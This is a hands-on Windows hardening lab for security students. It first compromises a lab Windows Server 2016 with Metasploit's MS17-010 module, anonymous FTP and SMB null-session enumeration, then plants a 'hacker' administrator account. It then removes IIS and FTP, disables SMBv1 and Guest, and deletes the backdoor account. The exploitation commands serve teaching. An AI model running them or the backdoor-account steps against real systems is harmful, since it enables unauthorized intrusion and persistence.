InfoSecLab: Hardening
Hardening Windows
Introduction
Objective:
Securing an operating system is critical to a company or organization’s IT infrastructure. Learning how to secure Windows is extremely important because of the wide use of the operating system within companies, organizations, and homes. Learning the best practices for updating and securing Microsoft Windows is critical to protecting an organization’s assets.
Overview:
In this lab, you will take a Microsoft Windows system that has security-related issues and harden it. Security-related issues can include default usernames and passwords, clear-text protocols such as FTP and Telnet, and poorly configured web services. Windows systems are a large target for attackers because of their wide use in industry; when they are not secured properly they can be compromised, which can lead to data leakage as well as costly remediation. The Windows operating system initially had a poor reputation for security, but over the years Microsoft has worked hard to overcome this, and the newer versions of Windows on the market are known for much more robust security.
| Key Term | Description |
|---|---|
| Kali Linux | An Advanced Penetration Testing Linux distribution designed for digital forensics and penetration testing, ethical hacking, and network security assessments. |
| Anonymous FTP | Allows a user to connect to an FTP site without an account and upload or download files. |
| Metasploit | A framework that contains exploits for various information systems. |
| nmap | A port scanner which will indicate whether ports are open or closed on a remote system. |
| Vulnerability | A weakness in code that can be exploited. |
Hardening Windows
- Click on the Kali VM in the topology and log in to with the username and password below.
| Operating Systems | Username | Password |
|---|---|---|
| Linux | root | toor |
Exploitation
In order to have a full understanding of why you need to secure systems, it is a good idea to see what the results can be if someone fails to patch a system. In the first section of the lab, we will exploit Windows Server 2016 with a vulnerability that is rated critical: it allows unauthenticated remote code execution, so an attacker who reaches the host can do a large amount of damage.
- Open the terminal on Linux by clicking on the command prompt shortcut in the taskbar.
- Type the following command to view your IP address on Linux. Press Enter.
root@kali:~# ifconfig eth0
Note: Your IP address is 192.168.1.50.
Challenge #
What is the number of flags equal to in this ifconfig output?
- Type the following command to ping the Windows Server. Press Enter.
root@kali:~# ping 192.168.1.100 -c 4
Challenge #
What is the TTL value when you ping this remote Windows Server?
- Type the following command to scan the Windows Server. Press Enter.
root@kali:~# nmap 192.168.1.100
Challenge #
What is the version of nmap installed on Kali (format X.XX)?
The goal of this lab is to harden Windows. The first thing we see in the port scan is that port 21 (FTP) is open. FTP sends credentials in plain text, which is a serious security issue. Another issue with FTP sites is that they sometimes allow anonymous access, and allow those anonymous users to download or upload files. If anonymous users can store files on a server, the company is liable for whatever ends up there, including content that should never be on its systems. We will now test the FTP server to see if anonymous access is allowed and whether file download and upload are permitted.
- Type the following command to create a fake mp3 file. Press Enter.
root@kali:~# echo this is not a real mp3 file > 8675309.mp3
- Type the following command to connect to the FTP server. Press Enter. After connecting, log in with the name ftp (which can be used in place of anonymous). For the password, type ftp, or password, or just press Enter: if anonymous access is enabled, the server accepts the anonymous account with any password.
root@kali:~# ftp 192.168.1.100
Note: The password will not be displayed when you type it for security purposes.
- Type the following at the FTP prompt. Press Enter.
ftp> ls
ftp> get flag.txt
ftp> put 8675309.mp3
ftp> bye
- Type the following command to view the flag. Press Enter.
root@kali:~# cat flag.txt
Challenge #
What is the 6 digit flag code?
In the next step, we will rescan the server:
- Type the following command to scan the Windows Server. Press Enter.
root@kali:~# nmap 192.168.1.100
The scan also shows port 80 (HTTP) open among the other ports. Web traffic should be served over HTTPS, and most sites use it now. We will now test whether the website is actually being used for company purposes or was never set up.
- Click on the Windows Key and then select Web Browser.
- In the URL bar, type http://192.168.1.100. Press Enter.
Challenge #
What color shirt is the person who is alone wearing on this web page?
Note: This is the default web page for Internet Information Services and has not been configured. Close the browser.
In the next step, we will rescan the server:
- Type the following command to scan the Windows Server. Press Enter.
root@kali:~# nmap 192.168.1.100
The scan also shows that File and Print Sharing (SMB, ports 139 and 445) is open.
- Type the following command to enumerate the shares. Press Enter.
root@kali:~# smbclient -L \\192.168.1.100
Just press Enter when you are asked for the password.
Challenge #
What is the comment for the C$ share?
- Click on the Windows Key and then select Web Browser.
- In the URL bar, type https://www.google.com.
- Search for SMB Exploit Windows Server 2016.
Challenge #
What is the name of the exploit that comes up (format MSXX-XXX)?
- Close the browser.
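The three findings so far (anonymous FTP with upload, the stock IIS page served over plain HTTP, and shares listable without credentials) can be re-tested without a GUI, which is useful when you want to prove a fix later. The script below is an added example and is not part of the original lab: it runs from a second Windows host (Windows 8 / Server 2012 or later, for Test-NetConnection) rather than from Kali, and reports each condition. The target address 192.168.1.100, the anonymous password string, and the marker file name anon-write-test.txt are assumptions chosen for this lab.

```powershell
# Added example (not from the lab): remote checks for the three recon findings.
# Assumes a Windows host with network reach to the target; the address and
# the marker file name are assumptions.
param([string]$Target = '192.168.1.100')

function Test-OpenPort {
    param([string]$ComputerName, [int]$Port)
    (Test-NetConnection -ComputerName $ComputerName -Port $Port `
        -WarningAction SilentlyContinue).TcpTestSucceeded
}

function Test-AnonymousFtp {
    # Logs in as anonymous, lists the root directory, then tries to upload a marker file.
    param([string]$Server, [string]$MarkerName = 'anon-write-test.txt')
    $cred   = [System.Net.NetworkCredential]::new('anonymous', 'guest@example.com')
    $result = [ordered]@{ AnonymousLogin = $false; Files = @(); UploadAllowed = $false }
    try {
        $list = [System.Net.FtpWebRequest]::Create("ftp://$Server/")
        $list.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectory
        $list.Credentials = $cred
        $resp   = $list.GetResponse()
        $reader = [System.IO.StreamReader]::new($resp.GetResponseStream())
        $result.Files = @($reader.ReadToEnd() -split "`r?`n" | Where-Object { $_ })
        $reader.Dispose(); $resp.Close()
        $result.AnonymousLogin = $true
    } catch [System.Net.WebException] {
        # 530 (login failed) or a refused connection: anonymous access is off.
        return [pscustomobject]$result
    }
    try {
        $up = [System.Net.FtpWebRequest]::Create("ftp://$Server/$MarkerName")
        $up.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
        $up.Credentials = $cred
        $bytes  = [System.Text.Encoding]::ASCII.GetBytes("anonymous write test`n")
        $stream = $up.GetRequestStream()
        $stream.Write($bytes, 0, $bytes.Length); $stream.Dispose()
        $up.GetResponse().Close()
        $result.UploadAllowed = $true
    } catch [System.Net.WebException] {
        # 550 (permission denied): anonymous users can read but not write.
    }
    [pscustomobject]$result
}

function Test-DefaultIisPage {
    # The stock IIS start page is titled "IIS Windows Server" and references iisstart.png.
    param([string]$Server)
    try {
        $page = Invoke-WebRequest -Uri "http://$Server/" -UseBasicParsing -TimeoutSec 10
        return ($page.Content -match 'iisstart\.png' -or
                $page.Content -match '<title>IIS Windows Server</title>')
    } catch { return $false }
}

function Get-NullSessionShares {
    # Classic null session: connect to IPC$ with an empty user and password, then list shares.
    param([string]$Server)
    $null = net use "\\$Server\IPC$" "" /user:"" 2>&1
    if ($LASTEXITCODE -ne 0) { return @() }     # null sessions refused: nothing to enumerate
    $shares = net view "\\$Server" /all 2>&1
    net use "\\$Server\IPC$" /delete /y 2>&1 | Out-Null
    # Share lines look like "C$   Disk   Default share"; keep the share names only.
    @($shares | Where-Object { $_ -match '^\S+\s+(Disk|Print|IPC)\s' } |
        ForEach-Object { ($_ -split '\s+')[0] })
}

$ports = 21, 80, 139, 445 | ForEach-Object {
    [pscustomobject]@{ Port = $_; Open = Test-OpenPort $Target $_ }
}
$ports | Format-Table -AutoSize
if (($ports | Where-Object Port -eq 21).Open)  { Test-AnonymousFtp -Server $Target | Format-List }
if (($ports | Where-Object Port -eq 80).Open)  { "Default IIS page over HTTP: $(Test-DefaultIisPage -Server $Target)" }
if (($ports | Where-Object Port -eq 445).Open) { "Shares visible to a null session: $((Get-NullSessionShares -Server $Target) -join ', ')" }
```

Run it once now and again after the Hardening section: ports 21 and 80 should then be closed, and Get-NullSessionShares should return nothing. If the upload succeeds, delete the marker file from the server afterwards.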
- Type the following command to initialize the database for Metasploit. Press Enter.
root@kali:~# msfdb init
Challenge #
What is the name of the database user created (format xxx)?
- Type the following command to start Metasploit. Press Enter. The picture you see might look different.
root@kali:~# msfconsole
- Type the following command to search for the MS17-010 exploit. Press Enter.
msf5 > search MS17-010
- Type the following command to select the MS17-010 exploit. Press Enter.
msf5 > use exploit/windows/smb/ms17_010_psexec
- Type the following command to get the relevant information about MS17-010. Press Enter.
msf5 exploit(windows/smb/ms17_010_psexec) > info
- The next step will be critical to our remediation later. Scroll down to the bottom of the info and right-click the first reference and select Open Link.
- A Windows system that has not been patched, secured, and hardened remains exposed to this critical vulnerability.
- Switch back to the msf5 menu in Metasploit.
- Type the following command to set the remote host to 192.168.1.100. Press Enter.
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.1.100
- Type the following command to check if the system is vulnerable to MS17-010. Press Enter.
msf5 exploit(windows/smb/ms17_010_psexec) > check
- Type the following command to exploit the system with MS17-010 vulnerability. Press Enter.
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
- If you do not receive the results below with a meterpreter prompt, type exploit again. Press Enter.
- Type the following command to get a command prompt. Press Enter.
meterpreter > shell
Challenge #
What is the version of Windows reported (format XX.X.XXXXX)?
- Type the following command to add an account. Press Enter.
C:\Windows\system32>net user hacker P@ssw0rd /add
- Type the following command to add the account to the administrators group. Press Enter.
C:\Windows\system32>net localgroup administrators hacker /add
- Type exit twice, pressing Enter each time, to close the command prompt and then the Meterpreter session to the victim.
Summary
In this section, you scanned a remote system for open ports. You discovered an FTP site that allowed anonymous access and let anonymous users download and store content. FTP is a plain-text protocol, so its use should be avoided. Then, you discovered a web server using HTTP instead of HTTPS; the website was in its default state and had not been configured at all. Next, you enumerated the shares on the remote server without a username and password. Finally, with the MS17-010 exploit you compromised the Windows Server, created a user “hacker”, and added that user to the administrators group.
Discussion Questions:
- What is Metasploit?
- What does the msfconsole command do?
- What does the msfdb init command do?
- How do you get information about an exploit?
- What is MS17-010?
Hardening
- Click the Windows Server icon from the topology. Click the Send Ctrl+Alt+Delete button and then log in to the Windows Server with the username of Administrator and the password of P@ssw0rd.
- The Server Manager will appear.
- Click Manage. Click Remove Roles and Features. Click Next. Click Next.
- At the Remove Server Roles Screen, examine the Web Server Roles by clicking the down arrow.
- Click the box in front of the Web Server so the box turns from black to white. This will remove all of the Web Server (IIS) Roles. Click Next. Click Next. Click Remove.
- View the Feature removal progress. Click Close when finished. This will take a few minutes.
- Right-click the Windows Key. Click Shut down or sign out and click Restart.
- Select Hardware: Maintenance (Unplanned) and click Continue.
- Click the Send Ctrl+Alt+Delete button and then log in to the Windows Server with the username of Administrator and the password of P@ssw0rd.
- Go back and click on Kali from the topology. Within the msf5 subprompt, type the following command. Press Enter.
msf5 exploit(windows/smb/ms17_010_psexec) > nmap 192.168.1.100
You have now removed FTP (including the anonymous FTP site) and the default web server that was never set up or used. The system is starting to be much more secure, but there is still the matter of the SMB vulnerability and the ability to browse shares without authentication.
- Switch back to the Windows Server and open the command prompt by double-clicking on the shortcut to the desktop.
- Type the following command to check the status of the guest account. Press Enter.
C:\>net user guest
- Type the following command to set the status of the guest account. Press Enter.
C:\>net user guest /active:no
- Type the following command to check the status of the guest account. Press Enter.
C:\>net user guest
- Switch back to the Kali machine and type the following command. Press Enter when you are asked for the password. Notice that you are no longer able to enumerate the shares.
msf5 exploit(windows/smb/ms17_010_psexec) > smbclient -L \\192.168.1.100
- Type the following command and press Enter.
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
Challenge #
What is the number value for Command (format XXX)?
- Switch back to Windows. In the command prompt, type the following command to view the administrative accounts on the system. Press Enter.
C:\>net localgroup administrators
- The hacker account should not be on this system. Type the command below to disable it (disabling stops logons; deleting the account entirely is the stronger cleanup). Press Enter.
C:\>net user hacker /active:no
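The same hardening can be done from an elevated PowerShell prompt on the server instead of Server Manager and net.exe, which makes it repeatable across many hosts. The script below is an added example, not part of the lab. Besides the lab's steps it addresses the two items left open above: the SMBv1 exposure behind MS17-010 (disable and remove SMBv1, confirm the patch) and unauthenticated share enumeration (the RestrictAnonymous LSA settings). Assumptions: Administrator is the only sanctioned local administrator, the backdoor account is named hacker, and the update number checked (KB4013429, the March 2017 cumulative update for Server 2016) is given from memory and should be confirmed against the MS17-010 bulletin; later cumulative updates supersede it, so its absence alone means "check Windows Update", not "unpatched". Reboot after step 1 before trusting the checks in step 5.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the lab): hardening the Server 2016 VM from PowerShell.
# Assumptions: 'Administrator' is the only sanctioned admin, the attacker's
# account is 'hacker', and KB4013429 is the Server 2016 update for MS17-010.

# 1. Remove the unused Web Server (IIS) role. FTP Server is a role service
#    under it, so the anonymous FTP site goes with it. Reboot afterwards.
if ((Get-WindowsFeature -Name Web-Server).Installed) {
    Uninstall-WindowsFeature -Name Web-Server -IncludeManagementTools
}

# 2. Disable Guest and refuse anonymous (null-session) enumeration.
#    RestrictAnonymous=1 blocks anonymous enumeration of SAM accounts and shares;
#    RestrictAnonymousSAM=1 blocks anonymous enumeration of SAM accounts.
Disable-LocalUser -Name 'Guest'
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
Set-ItemProperty -Path $lsa -Name 'RestrictAnonymous'    -Value 1 -Type DWord
Set-ItemProperty -Path $lsa -Name 'RestrictAnonymousSAM' -Value 1 -Type DWord

# 3. MS17-010 is an SMBv1 bug: turn SMBv1 off, remove its binaries, and
#    confirm the patch. A missing KB only means "check Windows Update".
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
if ((Get-WindowsFeature -Name FS-SMB1).Installed) {
    Uninstall-WindowsFeature -Name FS-SMB1
}
if (-not (Get-HotFix -Id 'KB4013429' -ErrorAction SilentlyContinue)) {
    Write-Warning 'KB4013429 not listed: verify a March 2017 or later cumulative update is installed'
}

# 4. Audit local administrators and remove (not merely disable) the backdoor.
$sanctioned = @('Administrator')
foreach ($m in Get-LocalGroupMember -Group 'Administrators') {
    $name = $m.Name.Split('\')[-1]           # strip the "HOST\" prefix
    if ($sanctioned -notcontains $name) { Write-Warning "Unexpected administrator: $($m.Name)" }
}
if (Get-LocalUser -Name 'hacker' -ErrorAction SilentlyContinue) {
    Remove-LocalUser -Name 'hacker'
}

# 5. Prove it. After the reboot nothing should listen on 21 or 80,
#    SMB1 should be off, Guest disabled, and only sanctioned admins left.
Get-NetTCPConnection -State Listen |
    Where-Object { $_.LocalPort -in 21, 80 } |
    Select-Object LocalAddress, LocalPort, OwningProcess
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
Get-LocalUser -Name 'Guest' | Select-Object Name, Enabled
Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, PrincipalSource
```

Removing SMBv1 is what actually closes the MS17-010 path; disabling Guest only breaks this particular Metasploit module's login, and an attacker with any valid credential would still reach the vulnerable code on an unpatched host. Step 5 from the server plus a rescan from Kali (`nmap 192.168.1.100`) together answer the last discussion question below.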
Summary
There are hardening tasks that should be performed on systems, such as:
- Disabling the guest account
- Using encrypted protocols instead of clear text ones
- Disabling anonymous access
- Disabling unauthenticated share enumeration
- Windows updates
- Removing websites with default configurations
- Viewing administrative accounts
- Removing unauthorized accounts
As you saw in the first section, systems that are not hardened can cause a heap of trouble for a company or organization. This can lead to a compromise that hurts the company’s reputation or damages it financially. Securing and hardening systems is paramount in this day of information warfare.
Discussion Questions:
- How do you remove Internet Information Services?
- How do you check for administrator accounts at the command line?
- How do you deactivate the guest account from the command line?
- How do you check to see if an account is active from the command line?
- After removing FTP and HTTP, and rebooting, what is a final step you can take to prove they are removed?